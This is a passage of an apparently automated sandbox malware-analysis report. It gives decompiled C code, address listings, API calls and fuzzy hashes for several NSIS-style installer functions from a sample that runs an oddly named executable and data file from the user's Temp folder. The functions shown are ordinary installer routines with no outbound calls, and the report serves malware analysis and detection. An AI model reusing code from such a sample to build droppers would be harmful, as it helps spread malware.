									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                            0x004066a5
                            0x004066a5
                            0x004066a5
                            0x004066ab
                            0x004066b0
                            0x004066c1
                            0x004066c1
                            0x004066c9
                            0x004066ca
                            0x004066cb
                            0x004066cc
                            0x004066cf
                            0x004066d7
                            0x004066d9
                            0x004066ea
                            0x004066ed
                            0x004066ed
                            0x004066f1
                            0x004066f7
                            0x004066fa
                            0x004068d5
                            0x004068d5
                            0x004068e0
                            0x004068ec
                            0x004068ec
                            0x00000000
                            0x00406700
                            0x00406705
                            0x0040671a
                            0x0040671b
                            0x00406721
                            0x004068b3
                            0x004068c1
                            0x004068c4
                            0x004068c4
                            0x004068b5
                            0x004068b8
                            0x004068bb
                            0x004068bd
                            0x004068bd
                            0x004068c6
                            0x004068c6
                            0x004068cc
                            0x004068cf
                            0x00406702
                            0x00000000
                            0x00406702
                            0x00000000
                            0x004068cf
                            0x00406727
                            0x0040672a
                            0x00406739
                            0x00406740
                            0x0040674c
                            0x0040674f
                            0x00406752
                            0x00406753
                            0x00406758
                            0x0040675e
                            0x00406761
                            0x00406764
                            0x00406857
                            0x0040685c
                            0x0040688f
                            0x00406894
                            0x00406899
                            0x0040689e
                            0x0040689e
                            0x004068a3
                            0x004068a9
                            0x004068ac
                            0x00000000
                            0x004068ac
                            0x0040685e
                            0x00406861
                            0x00406864
                            0x00406879
                            0x00406880
                            0x00406866
                            0x0040686d
                            0x0040686d
                            0x00406888
                            0x0040688b
                            0x0040684f
                            0x00406850
                            0x00406850
                            0x00000000
                            0x0040688b
                            0x00406771
                            0x00406775
                            0x00406775
                            0x00406776
                            0x00406778
                            0x004067b5
                            0x004067b8
                            0x004067c8
                            0x004067cb
                            0x004067d3
                            0x004067d9
                            0x004067d9
                            0x00406834
                            0x00406834
                            0x00406836
                            0x00000000
                            0x00000000
                            0x004067dd
                            0x004067e2
                            0x004067e3
                            0x004067e5
                            0x004067fc
                            0x0040680a
                            0x00406810
                            0x00406812
                            0x00406830
                            0x00406830
                            0x00406830
                            0x00000000
                            0x00406830
                            0x00406818
                            0x00406821
                            0x00406824
                            0x0040682a
                            0x0040682e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040682e
                            0x004067f6
                            0x004067f8
                            0x004067fa
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004067fa
                            0x00000000
                            0x00406834
                            0x004067c0
                            0x00000000
                            0x0040677a
                            0x00406798
                            0x004067a1
                            0x0040683e
                            0x00406842
                            0x0040684a
                            0x0040684a
                            0x00000000
                            0x00406842
                            0x004067ab
                            0x00406838
                            0x0040683c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040683c
                            0x00406778
                            0x00000000
                            0x00406705

                            APIs
                            • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000400), ref: 004067C0
                            • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                            • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                            • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Directory$SystemWindowslstrcatlstrlen
                            • String ID: "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                            • API String ID: 4260037668-1106327437
                            • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                            • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                            • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                            • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                            0x004056d0
                            0x004056da
                            0x004056df
                            0x004056e5
                            0x004056f0
                            0x004056f3
                            0x004056f6
                            0x004056fc
                            0x004056fc
                            0x00405702
                            0x0040570a
                            0x0040570d
                            0x0040572a
                            0x0040572e
                            0x00405737
                            0x00405737
                            0x00405741
                            0x0040574a
                            0x00405756
                            0x0040575d
                            0x00405761
                            0x00405764
                            0x00405777
                            0x00405785
                            0x00405785
                            0x00405789
                            0x0040578b
                            0x0040578e
                            0x00000000
                            0x0040578e
                            0x0040570f
                            0x00405717
                            0x0040571f
                            0x00405725
                            0x00000000
                            0x00405725
                            0x0040571f
                            0x0040570d
                            0x0040579a

                            APIs
                            • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                            • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                            • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                            • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                              • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                              • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                            • String ID: ('B
                            • API String ID: 1495540970-2332581011
                            • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                            • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                            • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                            • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                            0x0040463d
                            0x004046f3
                            0x00000000
                            0x004046f3
                            0x0040464e
                            0x00404652
                            0x00000000
                            0x0040466c
                            0x0040466c
                            0x00404675
                            0x00000000
                            0x00000000
                            0x00404677
                            0x00404683
                            0x00404686
                            0x00404686
                            0x0040468c
                            0x00404692
                            0x00404692
                            0x0040469e
                            0x004046a4
                            0x004046ab
                            0x004046ae
                            0x004046b1
                            0x004046b3
                            0x004046b3
                            0x004046bb
                            0x004046c1
                            0x004046c1
                            0x004046cb
                            0x004046d0
                            0x004046d3
                            0x004046d8
                            0x004046db
                            0x004046db
                            0x004046eb
                            0x004046eb
                            0x00000000
                            0x004046ee

                            APIs
                            • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                            • GetSysColor.USER32(00000000), ref: 00404686
                            • SetTextColor.GDI32(?,00000000), ref: 00404692
                            • SetBkMode.GDI32(?,?), ref: 0040469E
                            • GetSysColor.USER32(?), ref: 004046B1
                            • SetBkColor.GDI32(?,?), ref: 004046C1
                            • DeleteObject.GDI32(?), ref: 004046DB
                            • CreateBrushIndirect.GDI32(?), ref: 004046E5
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                            • String ID:
                            • API String ID: 2320649405-0
                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                            • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                            • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                            0x004026ec
                            0x004026ee
                            0x004026f1
                            0x004026f3
                            0x004026f6
                            0x004026fb
                            0x004026ff
                            0x00402702
                            0x00402705
                            0x00402c2a
                            0x00402c2d
                            0x0040270b
                            0x0040270b
                            0x00402712
                            0x00402714
                            0x00402714
                            0x0040271a
                            0x0040287e
                            0x0040287e
                            0x00402881
                            0x00402886
                            0x004015b6
                            0x0040292e
                            0x0040292e
                            0x00000000
                            0x00402720
                            0x00402721
                            0x0040272c
                            0x0040272f
                            0x0040273b
                            0x0040273f
                            0x004027d7
                            0x004027ef
                            0x004027ff
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00402745
                            0x00402745
                            0x00402748
                            0x00402749
                            0x0040274c
                            0x00402751
                            0x00402758
                            0x00402760
                            0x00000000
                            0x00402766
                            0x00402766
                            0x0040276b
                            0x00000000
                            0x00402771
                            0x00402771
                            0x00402779
                            0x0040277c
                            0x0040277f
                            0x0040283a
                            0x00402841
                            0x00402785
                            0x0040278b
                            0x00402797
                            0x00402801
                            0x00402801
                            0x00402799
                            0x00402799
                            0x0040279c
                            0x0040279e
                            0x0040279e
                            0x0040279e
                            0x004027a1
                            0x004027a6
                            0x004027a9
                            0x00000000
                            0x00000000
                            0x004027ab
                            0x004027ae
                            0x004027bc
                            0x004027c2
                            0x004027d0
                            0x00000000
                            0x004027d2
                            0x00000000
                            0x004027d2
                            0x00000000
                            0x004027d0
                            0x0040279e
                            0x00402804
                            0x00402807
                            0x00000000
                            0x00402809
                            0x0040280e
                            0x0040284f
                            0x00402871
                            0x00402878
                            0x0040285d
                            0x0040285d
                            0x00402860
                            0x00402863
                            0x00402866
                            0x00402866
                            0x00000000
                            0x00402817
                            0x00402817
                            0x0040281a
                            0x0040281d
                            0x00402823
                            0x00402827
                            0x0040282a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040282a
                            0x0040280e
                            0x00402807
                            0x0040277f
                            0x0040276b
                            0x00402760
                            0x00000000
                            0x0040282c
                            0x0040282c
                            0x0040282f
                            0x00402838
                            0x00000000
                            0x0040272f
                            0x0040271a
                            0x00402c33
                            0x00402c39

                            APIs
                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                              • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: File$Pointer$ByteCharMultiWide$Read
                            • String ID: 9
                            • API String ID: 163830602-2366072709
                            • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                            • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                            • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                            • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                            0x004068f1
                            0x004068fa
                            0x00406911
                            0x00406911
                            0x00406918
                            0x00406924
                            0x00406924
                            0x00406927
                            0x0040692a
                            0x0040692f
                            0x00406931
                            0x0040693a
                            0x0040693e
                            0x0040695b
                            0x00406963
                            0x00406963
                            0x00406968
                            0x0040696a
                            0x0040696d
                            0x00406972
                            0x00406973
                            0x00406977
                            0x00406977
                            0x00406978
                            0x0040697f
                            0x00406981
                            0x00406988
                            0x00000000
                            0x00000000
                            0x00406990
                            0x00406996
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406996
                            0x0040699b

                            APIs
                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                            • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                            • CharNextW.USER32(?,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                            • CharPrevW.USER32(?,?,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Char$Next$Prev
                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                            • API String ID: 589700163-1201062745
                            • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                            • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                            • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                            • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
